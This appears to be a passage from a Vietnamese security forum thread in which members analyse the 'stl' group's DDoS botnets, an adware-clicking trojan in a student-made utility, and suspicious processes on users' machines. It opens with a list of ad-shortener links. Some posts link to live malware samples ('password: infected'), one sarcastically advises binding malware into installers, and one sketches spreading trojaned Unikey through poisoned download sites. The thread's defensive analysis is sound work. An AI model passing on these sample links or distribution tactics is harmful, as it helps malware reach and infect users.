 http://44ce52c8.linkbucks.com
 http://44ce52c8.linkbucks.com
 http://5fffee9b.linkbucks.com
 http://bfbf5fab.linkbucks.com
 http://438e215b.linkbucks.com
 http://1ec41b10.linkbucks.com
 http://49abc570.linkbucks.com
 http://49abc570.linkbucks.com
 http://49abc570.linkbucks.com
 http://54a960f9.linkbucks.com
 http://d3125c51.linkbucks.com
 http://aa3cee9a.linkbucks.com
 http://40df7943.linkbucks.com
 http://a47ff0db.linkbucks.com
 http://a47ff0db.linkbucks.com
 http://a47ff0db.linkbucks.com
 http://6fcc3f8e.linkbucks.com
 http://141e8889.linkbucks.com
 http://8464fce6.linkbucks.com
Download phần mềm này tại: http://www.toitietkiem.vn/sites/default/files/ToiTietKiem.Vn%20Professional%20Setup.rar Chỉ biết bó 3 chân.com. Càng lúc càng loạn ! Không biết FPT và Toyota có biết là phần mềm và nhóm sv này đã làm điều bậy bạ này không, có đáng để họ khen thưởng, tung hô không ? PS: Không không chắc sẽ có nhiều người ghét mình, coi mình là kẽ "chọc gậy bánh xe" quá :-(

Không những phần mềm có trojan click quảng cáo mà ngay cả website phân phối phần mềm của nhóm sinh viên này cũng tạo những popup quảng cáo để kiếm tiền dù người dùng không click vào bất cứ quảng cáo nào cả :( . Sự vụ này được bolzano_1989 lần đầu phát hiện khi điều tra nguyên nhân dẫn đến việc xuất hiện hàng loạt các cửa sổ quảng cáo của các trang web Tàu ( lại là Tàu :( ) được mở bởi Internet Explorer ở máy tính một người bạn mỗi khi khởi động máy tính, hiện giờ những hành vi bẩn của nhóm sinh viên và phần mềm này đã biến thái và trở nên tinh vi hơn như anh TQN đã nêu ở trên. Link ở diễn đàn CMCLab Support: http://support.cmclab.net/vn/ung-dung-tien-ich/toitietkiem-vn-professional-tiet-kiem-dien-toi-uu-cho-may-tinh/

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

File ở link tải từ trang chủ ToiTietKiem.Vn Professional hiện đã được xoá, các bạn sinh viên đh FPT đầy tham vọng kiếm tiền định giở trò gì nữa đây :-) : http://www.toitietkiem.vn/sites/default/files/ToiTietKiem.Vn%20Professional%20Setup.rar

To bolzano_1989 Em resize lai cái image này đi để nó khỏi phá vỡ khung hình của forum, dù đã zoom out hết cỡ. Hiên tại Dimensions của nó là 1,366px × 768px., nên resize nó xuống còn khoảng 800 pixels x ....pixels là được. PXMMRF

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

TQN wrote:

Chỉ biết bó 3 chân.com. Càng lúc càng loạn ! Không biết FPT và Toyota có biết là phần mềm và nhóm sv này đã làm điều bậy bạ này không, có đáng để họ khen thưởng, tung hô không ? PS: Không không chắc sẽ có nhiều người ghét mình, coi mình là kẽ "chọc gậy bánh xe" quá :-(

Việc Đại Học FPT khen thường và tung hô nhóm sinh viên này cũng gần giống 1 hình thức để PR cho trường ĐH FPT. vì mục đích chính của việc lập ĐH-FPT là để kinh doanh. Hiện nay trường cũng không chú trọng vào việc đào tạo - giáo dục mấy nữa. mọi quảng cáo trên Báo, website của trường kể cả những lời nói của Hiệu Phó Nguyễn Xuân XXX trên báo cóc (1 tờ báo phát hành nội bộ trường) cũng chỉ là chém gió. Hoàn toàn không có thật, việc này nếu bạn nào học ở FPT cũng biết được 1 số phần. Chỉ trong chăn mới biết chăn có rận

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Thôi, tránh lạc đề anh em. Chỉ là bức xúc tình trạng làm ăn gian dối, đạo đức xuống cấp thôi. Mình chỉ nhắc mấy anh em sv FPT đó là được rồi, bolzano. Mấy em sv FPT đó chịu khó remove cái Form3 ra giùm đi. Kiếm tiền thì nên quang minh chánh đại chứ, đừng làm những hành động vậy. Đã có ý tưởng tốt, viết phần mềm free thì free cho trót ! Em nhớ hồi xưa ông thầy dạy Anh Văn hồi PT của em có chế một câu: "Nhân bất học bất chi lý, trẻ không học lớn lên chích ma tuý, mình có học lớn lên làm đại uý" ;) Đùa một chút cho mọi anh em bớt căng thẳng. PS: Tình trạng cài cắm virus, malwares, thật giả lẫn lộn giờ nhiều quá rồi. Em đi nhậu mà cũng không biết tin thằng bạn nhậu nào cả ! Cứ nghĩ trong đầu, mẹ, không biết nó có phải là thành viên stl không ? =)) Thôi quay lại tìm con bot giấu mặt đang "đốt" VNN anh em nhé !

Phân tích tính chất vài trận DDoS HVA vừa qua.

songvedemdl — GMT

híc, điều gì đang xảy ra trong pc cua em?? em không đủ khả năng để phân tích nên đã quay phim lại TCPView để up lên nhờ mấy anh phân tích. máy em đã update avira thường xuyên và scan system rồi ( không hề phát hiện gì bất thường) nhưng vẫn tự kết nối tới ns2.tienve.org hay thutin.tienve.org và static.vdc.vn và rất nhiều facebook(??? ).... mỗi khi em dùng IE để vào một web bất kỳ bản ghost do em tự làm có sử dụng tool spat 6.*.* để tự nhận driver, có khi nào đó chính là mầm mống của "mèo què " của tụi STL không? vì thật sự ở việt nam rất nhiều người dùng spat để làm ghost tự nhận driver kể cả windows xp va windows 7 ? link ghi lại màn hình TCPView http://www.mediafire.com/?c3mjeeu4d9b9czv hình:

đây là file AutoRuns http://www.mediafire.com/?57k76tbhmu8ifj7

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

songvedemdl, bạn vào HVAOnline thì thấy kết nối đến tienve.org là đúng rồi ;) . Bạn scan và gửi log sau cho mình nhé: Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/

Phân tích tính chất vài trận DDoS HVA vừa qua.

songvedemdl — GMT

bolzano_1989 wrote:

songvedemdl, bạn vào HVAOnline thì thấy kết nối đến tienve.org là đúng rồi ;) . Bạn scan và gửi log sau cho mình nhé: Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/

mình có up AutoRuns.arn ở trên rồi, nhưng giờ mình up autorunsc theo yêu cầu của bạn ở link sau http://www.mediafire.com/?hmrjyz3jz9gf791 dùng ghostExp để kiểm tra bản ghost và lôi đầu thằng PowerDrv.exe (thằng này để tự động cài driver và sẽ tự động bị xoá khi quá trình ghost tự nhận driver xong) ra thì Avira báo là virust nên up lên nhờ mấy anh coi thử link của nó đây http://www.mediafire.com/?gwq4q8wela8qa2x

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

mainguyendl có thể gửi 2 file sau lên để mọi người kiểm tra thêm: c:\program files\unikey v408\unikey.exe c:\program files\internet download manager\idman.exe

Phân tích tính chất vài trận DDoS HVA vừa qua.

songvedemdl — GMT

bolzano_1989 wrote:

mainguyendl có thể gửi 2 file sau lên để mọi người kiểm tra thêm: c:\program files\unikey v408\unikey.exe c:\program files\internet download manager\idman.exe

bạn đang nói mình ha? hay mainguyendl? nếu nói mình thì tối đi làm về mình se up lên mediafire cho bạn, thank bạn nhiều!!

Phân tích tính chất vài trận DDoS HVA vừa qua.

songvedemdl — GMT

mình mới lấy 2 file bạn yêu cầu up lên mediafire link download http://www.mediafire.com/?t46bborl6994bty

Phân tích tính chất vài trận DDoS HVA vừa qua.

whitesnow19 — GMT

FIle Unikey(>256KB) bạn songvedemdl dang xai la bản Mod, bản này mình đã từng up lên nhờ anh conmale và các anh khác phân tích mà vẫn chưa thấy trả lời, chắc tại các anh bạn quá. File IDMan của bạn signature thì invalid. Bạn nên cập nhật bản IDM mới nhất ấy, buidl 11 nha.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Cả hai files của bạn songvedem đều sạch.

Phân tích tính chất vài trận DDoS HVA vừa qua.

vikjava — GMT

TQN wrote:

Em đi nhậu mà cũng không biết tin thằng bạn nhậu nào cả ! Cứ nghĩ trong đầu, mẹ, không biết nó có phải là thành viên stl không ? =))

Chi mà khổ vậy anh. Có lẽ điều này còn nguy hiểm và tác hại hơn cả mấy con malware stl :-S

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

vikjava wrote:

TQN wrote:

Em đi nhậu mà cũng không biết tin thằng bạn nhậu nào cả ! Cứ nghĩ trong đầu, mẹ, không biết nó có phải là thành viên stl không ? =))
Chi mà khổ vậy anh. Có lẽ điều này còn nguy hiểm và tác hại hơn cả mấy con malware stl :-S

Cái này thì anh đã có ý kiến từ hồi tháng 7: /hvaonline/posts/list/120/39504.html

conmale wrote:

Trong trò chơi "chân chân giả giả" này cái thiệt hại ghê gớm nhất không phải là bị cài trojans, bị mất hòm thư hoặc bị bêu rếu một cách thô thiển mà là sự ngờ vực lẫn nhau. Những trò chơi của STL đẩy người ta tới chỗ chẳng có ai còn có thể tin ai được nữa vì tất cả đều có thể là giả dối, nguỵ tạo và lường gạt.

Phân tích tính chất vài trận DDoS HVA vừa qua.

dexxa — GMT

Em đi nhậu mà cũng không biết tin thằng bạn nhậu nào cả ! Cứ nghĩ trong đầu, mẹ, không biết nó có phải là thành viên stl không ?

Anh TQN nói thế xem chừng bị tẩu hoả bởi cái gọi là STL rồi. Mình nghĩ người thông minh thì dễ chứ sống tử tế nó mới khó ;). Phải không anh TQN

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

TQN wrote:

Mình chỉ nhắc mấy anh em sv FPT đó là được rồi, bolzano. Mấy em sv FPT đó chịu khó remove cái Form3 ra giùm đi. Kiếm tiền thì nên quang minh chánh đại chứ, đừng làm những hành động vậy. Đã có ý tưởng tốt, viết phần mềm free thì free cho trót ! Em nhớ hồi xưa ông thầy dạy Anh Văn hồi PT của em có chế một câu: "Nhân bất học bất chi lý, trẻ không học lớn lên chích ma tuý, mình có học lớn lên làm đại uý" ;) Đùa một chút cho mọi anh em bớt căng thẳng.

Thấy cu "thắng" học FPT tranh luận bên 4rum của cmc là do website bị "hacker" hack vào nên chèn trojan vào bản cài mà anh. Nhưng hình như là mấy cái Form3 này như anh nói là do chương trình của cu cậu bật lên để auto click. chứ không phải là do file exe nào của thằng "hacker" vì chắc chả thằng nào hâm lại đi resource cái toitietkiem.vn ra để lấy source rồi lại code lại thêm mấy cái Form3 -> build lại -> lại up lên server của toitietkiem.vn. Thường thì sẽ Binder cái malware vào :D. kinh nghiệm code phần mềm chứa mã độc là nên Binder mã độc vào chứ đừng code chèn vào phần mềm =)) để lúc bị phát hiện còn dễ cãi =)). tốt nhất là link download phần mềm từ trang chủ nên die =)) để cho người ta download phần mềm từ các diễn đàn khác ;)) mấy em nó mới vào đời, chưa có kinh nghiệm mấy vụ này. zzz Em nói sai chỗ nào mong anh em chỉ bảo hộ :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

levanduyet — GMT

Chào mọi người, Có vấn đề tôi không hiểu được là, nếu STL vẫn còn đang có thể tấn công DDOS Vietnamnet, vậy câu hỏi đặt ra là: "Tại sao STL không cho tấn công DDOS HVA nữa?" Theo thiển ý của tôi câu trả lời có thể là: 1. Mấy cái Botnet đó cũ, mà chúng ta chưa tìm ra. 2. STL không muốn tấn công HVA nữa, để HVA không dò tìm và phân tích mấy con botnet của STL. 3. Có thể có hai hệ thống tấn công khác nhau (STL + nhóm nào đó chẳng hạn). 4. ... LVD

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

levanduyet wrote:

Chào mọi người, Có vấn đề tôi không hiểu được là, nếu STL vẫn còn đang có thể tấn công DDOS Vietnamnet, vậy câu hỏi đặt ra là: "Tại sao STL không cho tấn công DDOS HVA nữa?" Theo thiển ý của tôi câu trả lời có thể là: 1. Mấy cái Botnet đó cũ, mà chúng ta chưa tìm ra. 2. STL không muốn tấn công HVA nữa, để HVA không dò tìm và phân tích mấy con botnet của STL. 3. Có thể có hai hệ thống tấn công khác nhau (STL + nhóm nào đó chẳng hạn). 4. ... LVD

Không phải đâu bạn. STL không tấn công HVA nữa là vì mỗi lần tấn công HVA thì sẽ có người gởi mẫu mã để RE và mấy cái bot masters bị phá hết. Hơn nữa, tấn công vô HVA mà không thấy HVA chết thì.... phí đạn. Tấn công chỗ khác có kết quả thì hoan hỉ hơn. Không có nhóm nào khác hết. STL là STL. Từ code cho đến cách dàn dựng, lây lan hoàn toàn đặc sệch STL.

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

Hôm nay có báo Văn Hoá đưa tin VNN bị tấn công. http://www.baovanhoa.vn/khoahoccongnghe/39233.vho Với tình trạng này thì bất cứ tờ website nào của Việt Nam, từ các trang báo mạng lớn lẫn các site nhỏ như blogs... cũng sẽ trở thành CON TIN của bọn STL này. Theo bài báo này thì các IP tấn công hầu hết xuất phát từ Việt Nam, sao không nhờ vả đến HVA RE team nhỉ, phân tích mẫu rồi gửi cho các trình AV thì bọn STL này hết đất sống. Theo ý kiến cá nhân thì chắc mấy anh TQN, Conmale ... chắc sẽ giúp đỡ VNN hết mình.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

texudo wrote:

Hôm nay có báo Văn Hoá đưa tin VNN bị tấn công. http://www.baovanhoa.vn/khoahoccongnghe/39233.vho Với tình trạng này thì bất cứ tờ website nào của Việt Nam, từ các trang báo mạng lớn lẫn các site nhỏ như blogs... cũng sẽ trở thành CON TIN của bọn STL này. Theo bài báo này thì các IP tấn công hầu hết xuất phát từ Việt Nam, sao không nhờ vả đến HVA RE team nhỉ, phân tích mẫu rồi gửi cho các trình AV thì bọn STL này hết đất sống. Theo ý kiến cá nhân thì chắc mấy anh TQN, Conmale ... chắc sẽ giúp đỡ VNN hết mình.

Anh thì lúc nào sẵn sàng nhưng anh không nghĩ vietnamnet hay baovanhoa sẽ nhờ anh em HVA giúp, ít ra là chính thức nhờ bởi vì có quá nhiều thứ "nhạy cảm".

Phân tích tính chất vài trận DDoS HVA vừa qua.

chimsetre — GMT

angel-pc wrote:

@cino lời cuối, chỉ 2 ý thôi: 1. Sử dụng cntt phục vụ cho chính trị và chính trị hoá cntt là 2 cái khác nhau 2. MÌNH CẢM THẤY DƯỜNG NHƯ một số admin của HVA cụ thể là bác comale có ý muốn lợi dụng mức độ ảnh hưởng của diễn đàn để chầm chậm đưa những tư tưởng chính trị, quan điểm của bác vào đầu óc của các mem trong diễn đàn, như vậy là không fair play với các mem trong diễn đàn vốn là những người đam mê cntt, và nó giống như một chiến thuật chính trị hoá cntt ở đây, đọc nhiều bài viết của bác ấy mình như bội thực với những quan điểm của bác ấy, trong bất cứ tình huống nào có thể bác ấy đều đưa luận điểm mang tính chính trị vào. @comale: bàn về chính trị(chưa nói đến nội dung là gì) là quyền của mỗi cá nhân, mình không có ý kiến, nhưng bàn như thế nào, trong tình huống nào để nó được tế nhị và phù hợp tiêu chí và tính chất của diễn đàn mới là vấn đề Nếu mình hiểu sai ý bạn coi như mình chưa nói nhé cino

Tui đăng ký nick lâu lắm rồi nhưng chả dám thảo luận vì tự nghĩ mình trình còi. Tuy không thảo luận, tui vẫn vào diễn đàn rất thường xuyên để đọc và học hỏi. Lần này tui đọc phản hồi của bạn thiên thần pê cê, tui thấy ngứa mắt chịu không nổi nên mới đánh bạo làm vài dòng cảm nghĩ. Một thằng vô danh tiểu tốt cù bất cù bơ như tui bây giờ có công ăn việc làm, có khả năng suy nghĩ và nhận xét, trở thành một thằng người hẳn hòi là nhờ anh conmale. Anh conmale chưa bao giờ trực tiếp chỉ dạy tui một cái gì hết nhưng tui học được từ anh ấy vô vàn thứ từ hồi 2004 đến nay. Không chỉ lĩnh vực kỹ thuật mà còn lĩnh vực tư duy và đời sống, anh conmale làm cho tui ngộ ra nhiều điều và gián tiếp truyền cho tui sức mạnh để vượt qua bao nhiêu là khó khăn trong bao nhiêu năm trời. Nếu đúng anh conmale đang "chầm chậm đưa những tư tưởng chính trị, quan điểm" của anh ấy vào đây thì tui thấy đây là chuyện đáng mừng bởi vì những tư tưởng chính trị và quan điểm của anh ấy chả làm cho một thẳng cù bơ cù bất như tui không tệ hại hơn mà ngược lại làm cho tui trở thành con người tốt hơn và hữu ích cho xã hội hơn. Tui thấy tội nghiệp bạn thiên thần pê cê vì bạn vẫn nằm trong một cái hộp mà không biết. Không đủ sức hoặc không muốn bước ra khỏi cái hộp. Hãy bước ra khỏi cái hộp đi bạn à. Có những thứ còn cao hơn và rộng hơn cả những cái "lề" mà bạn đang biết. PS: tui nói thật là tui dùng t0r để đăng nhập HVA vì sau vụ STL này, gió tanh quá, mưa nhiều máu quá.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Đừng lạc đề các bạn ! Chúng ta nên tập trung vào việc tìm mẫu. Ngoài mẫu iTunesHelper.exe và GoogleCrashHanlder.exe mà chúng ta đã biết là đã từng DDOS VNN, tui tin chắc vẫn còn mẫu nằm vùng khác và mẫu bot khác đang DDOS VNN. Mong các bạn tiếp tục truy tìm, monitor, theo dõi. Để dùng các trình packet capture, các bạn chịu khó tắt trình duyệt, tắt hết các autoruns có digital signature, được verified, dùng các tool Wireshark, SmSniff, NetwordMiner, TcpView... để capture. Cứ để máy chạy khoảng 2-3h, xem process nào dùng HTTP protocol, port 80 connect tới VNN (Do mấy anh stl coder cứ thích dùng API Sleep, ngủ thiệt lâu rồi mới dập). Còn mấy mẫu nằm vùng, ăn cắp thông tin của máy victim, tui đã RCE gần xong. Khi nào xong, tui sẽ post chi tiết phân tích và nhờ các bạn up mẫu lên các AVs. Dẹp hết cái đám nằm vùng này thì bot để DDOS sẽ không còn, không ai còn bị "bạch hoá" nữa, cho tui stl thành "dầu hắc hoá" luôn -:-) PS: Em xin nhắc lại, tụi stl này không đáng được viết hoa, bà con viết thường thành "stl" giùm em cái ! STL chỉ dành riêng cho C++ Standard Template Library thôi, còn "stl" thì bà con muốn đọc nhái thành gì cũng được ! Và cũng có một điều nữa nên nói luôn: stl đã gần như cạn kiệt mẫu "mèo què" rồi, tụi nó chỉ dùng lại các mẫu cũ, xào đi nấu lại, thêm mắm muối đôi chút. Ngay cả mẫu tui đang cố RCE hoàn chỉnh 100% thì cũng là code cũ của bộ Đao 360 độ chế lại thôi. Mấy anh dùng Đao 360 thì em dùng AK để phang, coi Đao sợ hay súng sợ ;) Hầu hết các mẫu của tụi này được viết vào năm 2010, "mèo què" 2011 rất ít. Bà con nào code hệ thống, malware được chuẩn bị có đợt tuyển malware coder mới vào 2012 nhé ! Cho em tham gia với, đang thất nghiệp coding đây, mấy anh stl ơi ơi ! Mẫu nằm vùng, ăn cắp thông tin nạn nhân để "bạch hoá", tui up ở đây: http://www.mediafire.com/?259kv56xit09c6b, password: infected, nằm chung trong thư mục này: http://www.mediafire.com/?tz745o0f678w8 Bà con xem trong file đó, có file nào tồn tại trên máy mình, xoá ngay lập tức giùm em cái, không thì mai mốt đụng tới tụi nó, tụi nó search trong HTTP server xxx của nó, tìm thông tin của bà con rồi public ra là mệt đấy (Chửi sao đây ha !). Các file .idb là các file IDA 6.1 database, chưa hoàn chỉnh lắm. Bà con nào có IDA 61 có thể mở file .idb đó lên và xem cách thức hoạt động của chúng !

Phân tích tính chất vài trận DDoS HVA vừa qua.

Xr0.9999 — GMT

anh TQN giúp e với, máy e bị dính botnet của STL, e thấy trong task của e có GoogleCrashHanlder.exe, bây giờ làm sao để gỡ bỏ nó vậy a ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

1. Start -> Run -> gõ Cmd 2. Gõ trong console window: taskkill /F /IM GoogleCrashHandler.exe /T 3. Download autoruns.exe từ http://technet.microsoft.com/en-us/sysinternals/bb963902, tìm GoogleCrashHander.exe ở đâu, right click, xoá đi. 4. Up mẫu GoogleCrashHandler.exe đó lên đâu đó cho anh em RE team của HVA phân tích. Up xong rồi xoá nó đi. 5. Xong, cho một con bot nữa của stl đi die cho rồi, thử xem thằng coder "mèo què" với thằng RCE, up mẫu cho AV, thằng nào nhanh hơn, hiệu quả hơn, thằng đó thắng ! Nhắc với anh em stl coder, đã pure C, pure API thì pure cho trót, đừng có lượm lặt đâu trên Internet, thấy có vài hàm dùng được, nhưng lại có dùng CString, thì đừng có cố mà mang vào. Em RCE mà thấy ngớ ngẫn lắm, vì khi mấy anh dùng tới CString, thì anh phải mang theo ít nhất 2,3 chục hàm internal của CString, của MFC, ATL. Bà con cứ open mấy file .idb trong QTTask.zip của em ra sẽ thấy, các hàm CString chỉ dùng cho duy nhất trong 1 hàm nào đó của mấy anh coder stl tự code. Code vậy thì hơi bị ngớ ngẫn đấy ! Ví dụ hàm EnsureDirs trong file .idb nào đó, hay hàm compare Process Name = Upper case của mấy anh stl, không không đang đi cao tốc lại rẽ đi vào đường quốc lộ, đường nông thôn. Làm em RCE cũng mệt đứ đừ, cứ tự hỏi, quái, làm cái gì vầy trời, có khùng không trời ! Em viết ra như trên thì chắc sẽ có nhiều người không đồng ý với em, cho là em tự cao tự đại, kiêu ngạo gì đó, vân vân và vân vân... ! Em không phải vậy, phân tích ra vậy, nói ra vậy để mọi người hiểu, về phương diện code, coder, stl cũng chỉ là những thằng bình thường, chỉ là nhưng newbie hay immediate level thôi, chả phải là thần thánh, hung thần gì cả, không có gì mà phải sợ tụi nó, và tụi này, từng thành viên cũng bình thường về trình độ như chúng ta thôi, chả giỏi hơn cái gì cả, chả phải "du côn học sinh" về giỏi hơn chúng ta ! Về phương diện kỹ thuật, tụi này cũng "phình phường" thôi, mọi người có kinh nghiệm RCE, VC++ coding một chút sẽ hiểu được code của tụi nó, hiểu được tụi nó nghỉ gì, muốn gì khi code con "mèo què" đó ! Điểm thứ hai, hầu hết mèo què của stl, dòng nào theo dòng đó (nằm vùng, ăn cắp thông tin, downloader, bot..), chỉ có một base code (code gốc) duy nhất theo dòng đó, khác nhau duy nhất chỉ là mấy cái string hardcode, encrypt, mấy cái thuật toán mã hoá, giãi mã khác nhau, mấy cái URL khác nhau thôi. Còn lại thì như anh chị em sinh đôi hết. Em nói đúng không mấy anh stl ? Mấy anh gần cạn hết mẫu rồi mà, phải không ? Chúng ta đang làm đúng, danh chánh ngôn thuận, đang đấu tranh với tệ nạn xã hội, tội phạm xã hội, tội phạm dùng công nghệ cao "hơi hơi", chả có gì phải sợ, phải giấu mặt với chúng hết ! Nếu chúng ta sợ hãi, chúng ta giấu mặt khi nói tới tụi nó, vô tình chúng ta làm chúng nghĩ rằng ai cũng sợ tụi nó, sợ thế lực đứng sau lưng tụi nó ! Sau này chúng sẽ càng hoành hoành, tác oai, tác quái, khống chế hết mọi thứ ! Lúc đó, tự do cá nhân, tự do IT, tự do Internet, tự do phát ngôn, tự do tìm hiểu thông tin mà Hiến Pháp VN ta quy định có còn không ? PS: Ngày hôm nay chạy cái xe cùi gần 100 km, về nhà, mệt đứ đừ, đọc mấy cái post thấy bức xúc quá !

Phân tích tính chất vài trận DDoS HVA vừa qua.

chieutuongtu — GMT

Em k fai là dân IT, e chỉ là 1 designer. Theo dỏi topic này từ đầu, e cũng chỉ đọc mà k tham gia ý kiến j. E thử đóng vai 1 anh stl, và với hiểu biết của mình e sẽ làm như sau: 1. Tổng hợp số liệu để năm đc các nhóm đối tượng chủ yếu sử dụng máy tính và internet thường xuyên. 2. Phân tích các phầm mềm, các ứng dụng bắt buộc fai có (hoặc sử dụng nhiều) của từng nhóm đối tượng. 3. Tìm cách phát tán các phần mềm, các ứng dụng (đã phân tích đc ở trên) đã "gắn" thêm mã độc vào cộng đồng các nhóm đối tượng. Để phát tán thì em sẽ: - Up lên host nào đó dễ dàng để tải (mf chẳng hạn) sau đó tích cực tham gia trao đổi chia sẽ thông tin, kiến thức và tất nhiên k quên kèm theo link trên các 4r lớn, có đông người truy cập. - Lập các blog cá nhân theo kiểu - cá nhân là người trong các nhóm đối tượng phân tích ở trên, sau đó tích cực viết bài chia sẽ tài liệu thông tin để tạo uy tiến và pview.Dần dà sẽ k quên, gởi kèm các link down phần mềm có mã độc. - Em sẽ tạo luôn 1 số trang chuyên chia sẽ phần mềm, dữ liệu và tích cực kéo gg cho nó lên top. Đởn giản, e kéo từ unikey,vietkey... khi có bác nào gg: unikey hay vietkey thì nó sẽ hiện trang e đầu tiên thay vì unikey.org ... và dĩ nhiên là hầu hết sẽ chọn down unikey ở trang của e -> dính chưởng. Em chỉ thử đặt mình vào vị trí các anh stl để tưởng tượng tý mà thấy bỉ ổi quá, nên e xin dừng bút ở đây. Hôm nào e lại tưởng tượng tiếp ah.

Phân tích tính chất vài trận DDoS HVA vừa qua.

quygia128 — GMT

Mà anh N ơi cái file "GoogleCrashHander.exe" này thật ra ai mà có sử dụng gì liên quan google là có mà. VD máy em cũng có path nó như thế này : C:\Program Files (x86)\Google\Update\1.3.21.69\GoogleCrashHander.exe Nhưng file này không thực thi trên hệ thống. Vậy anh có thể cho em và mọi người biết là có thể xoá luôn file này hay không ? (Không cần biết là virus hay gì cả) như vậy có ảnh hưởng gì ko? - Sao anh không hash mã MD5 của cái file có chứa malware để bà con nào có thì thì so sánh cho nó dễ anh, chứ thật giả lẫn lộn thế này khó phân biệt. -Tất cả những mẫu mà anh up lên Mediafire bây giờ chỉ cần nhấn tải về là KIS nó thịt ngay không soát 1 em :D :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Vậy là mừng đó em, nếu KIS thịt hết thì tốt chứ sao ! Còn mấy file mạo danh của stl hay lỡ có trùng đi nữa, nếu em có xoá thì chả chết thằng Tây đen nào cả, computer của em vẫn hoạt động bình thường. Khi em mạo danh, em sẽ mạo danh thằng nào là core của system, nếu user xoá lầm (hay xoá được) thì chỉ có nước Ghost hay format, install lại thôi. Còn "mèo què" của stl thì cứ mạo danh mấy cái updater, mấy cái fake linh tinh, xoá đi không sao cã. Còn về mã MD5, thì không được em à, mã MD5 chỉ xác định trên một mẫu duy nhất, còn trong khi đó, cũng cùng một mẫu của stl, cùng tên luôn, lại có vô số biến thể. Nên đừng care về MD5, cứ gặp là taskkill xong rồi xoá đi. Em dám chắc 100% là xoá xong chả bị gì cả, thậm chí nhẹ máy hơn, ít tốn băng thông hơn. Các cậu nào có GoogleCrashHandler.exe vui lòng up lên MF chẵng hạn để anh em RE team xem thử GoogleCrashHandler.exe có bao nhiêu biến thể rồi ! Gấp nhé ! Nhiều người cứ hỏi, vd như trên, GoogleCrashHandler.exe là file của Google, thì làm sao lại là mèo què của stl được: 1. Khi em dùng VC++ hay bất cứ trình compiler nào: Java, VB, Delphi, CBuilder..., em có thể build ra bất kỳ file .exe, .dll nào trùng tên với mấy cái file .exe, .dll nổi tiếng, phổ biến của các cty phần mềm nổi tiếng. Thậm chí, em sẽ build thành ThangCuAnh.exe, sau đó em ra ngoài console, Explorer, rename thành GoogleCrashHandler.exe, AcrobatUpdater.exe, StaticCaches.dat, History.db ( quen không stl coder ?)... cũng được. Tên không quan trọng, quan trọng là code bên trong của nó, cấu trúc file bên trong của nó. 2. Các file chính quy của Google, ITunes, Apple, Sun... đa số đều có Digital Signature, phong cách code rất sáng sủa, chiều thì trong sáng, không mập mờ, lằng ngoằng như mèo què của stl ! 3. stl coder không dùng các kỹ thuật anti AV, anti VM... phổ biến mà giới cao thủ VX thế giới dùng. Thay vào đó, chúng cố gắng code từng module của chúng thật "nai", nhưng cộng 3, 4 con "nai" thì thành con cáo, con mèo què !!!??? Vì vậy, các AV và chúng ta khi xem xét, phân tích từng module 1 của đám mèo què đó thì chưa thấy được mối nguy hiểm của nó. Vd gần nhất là mẫu QTTask.zip mà em vừa up lên, một đống module, cấu kết với nhau, IPC connect với nhau bằng Pipe, bằng Memory Mapping File API để lấy cắp thông tin victim up về một vài HTTP server và down mèo què mới về !

Phân tích tính chất vài trận DDoS HVA vừa qua.

Xr0.9999 — GMT

em lỡ tay xoá mất rồi, xoá xong giảm 2% ram, tks a TQN àk a xem giùm e cái log còn dính con nào nữa ko nhé a : System Idle Process 0 55.04 0 NT AUTHORITY\SYSTEM System 4 0.94 1.28 kB/s 48 kB NT AUTHORITY\SYSTEM NT Kernel & System smss.exe 240 260 kB Windows Session Manager Interrupts 1.45 0 Interrupts and DPCs csrss.exe 368 1.29 MB Client Server Runtime Process wininit.exe 436 908 kB Windows Start-Up Application services.exe 492 0.81 4.29 MB Services and Controller app svchost.exe 608 2.74 MB Host Process for Windows Services WmiPrvSE.exe 284 4.22 MB WMI Provider Host WmiPrvSE.exe 3160 0.18 14.52 MB WMI Provider Host WmiPrvSE.exe 3472 1.27 1.32 kB/s 4.36 MB WMI Provider Host dllhost.exe 1408 0.24 2.22 MB Xr09999-PC\Xr0.9999 COM Surrogate svchost.exe 724 0.40 2.68 MB Host Process for Windows Services atiesrxx.exe 832 992 kB AMD External Events Service Module atieclxx.exe 1216 1.24 MB AMD External Events Client Module svchost.exe 864 0.08 56 B/s 16.51 MB Host Process for Windows Services audiodg.exe 1020 16.35 MB Windows Audio Device Graph Isolation svchost.exe 896 0.07 41.08 MB Host Process for Windows Services dwm.exe 428 2.33 30.61 MB Xr09999-PC\Xr0.9999 Desktop Window Manager svchost.exe 924 2.09 5.1 kB/s 17.24 MB Host Process for Windows Services svchost.exe 1120 0.14 5.87 MB Host Process for Windows Services svchost.exe 1256 0.04 216 B/s 8.98 MB Host Process for Windows Services AsLdrSrv.exe 1428 796 kB ASLDR Service HControl.exe 2852 5.55 MB HControl ATKOSD.exe 2896 532 kB ATKOSD WDC.exe 2916 1.08 MB WDC spoolsv.exe 1496 4.57 MB Spooler SubSystem App svchost.exe 1524 0.02 48 B/s 8.89 MB Host Process for Windows Services svchost.exe 1632 0.09 84 B/s 5.11 MB Host Process for Windows Services ccsvchst.exe 1676 0.02 18.22 MB Symantec Service Framework ccsvchst.exe 1332 11.18 MB Symantec Service Framework TuneUpUtilitiesService32.exe 1744 2.99 MB TuneUp Utilities Service TuneUpUtilitiesApp32.exe 2116 1.59 MB 